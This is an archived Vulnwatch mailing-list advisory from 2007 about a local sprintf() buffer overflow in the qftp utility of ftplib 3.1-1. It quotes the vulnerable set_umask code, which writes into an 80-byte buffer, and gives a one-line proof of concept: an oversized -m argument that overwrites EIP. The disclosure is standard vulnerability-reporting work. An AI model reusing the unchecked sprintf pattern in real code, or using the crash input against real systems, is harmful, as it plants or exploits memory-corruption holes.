Vulnwatch mailing list archives
QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow
From: "starcadi starcadi" <starcadi () gmail com>
Date: Thu, 15 Mar 2007 19:28:21 +0100
http://nbpfaus.net/~pfau/ftplib/ qftp is a utility that performs file transfers using ftplib based on instructions presented on the command line.
Description
buffer overflow in sprintf(), set_umask don't check sizelen of passed argument.
Source error
in main(): 337: case 'm' : set_umask(optarg); break; .. void set_umask(char *m) { char buf[80]; sprintf(buf,"umask %s", m); ftp_connect(); FtpSite(buf, conn); }
POC
$ gcc ftplib.c getopt.c qftp.c -o ftpsend $ ftpsend localhost -l login -p passwd -m `perl -e "print 'a'x90"` Segmentation fault # eip addr: $1 = (void *) 0x61616161 -- ~ starcadi
Current thread:
- QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow starcadi starcadi (Mar 15)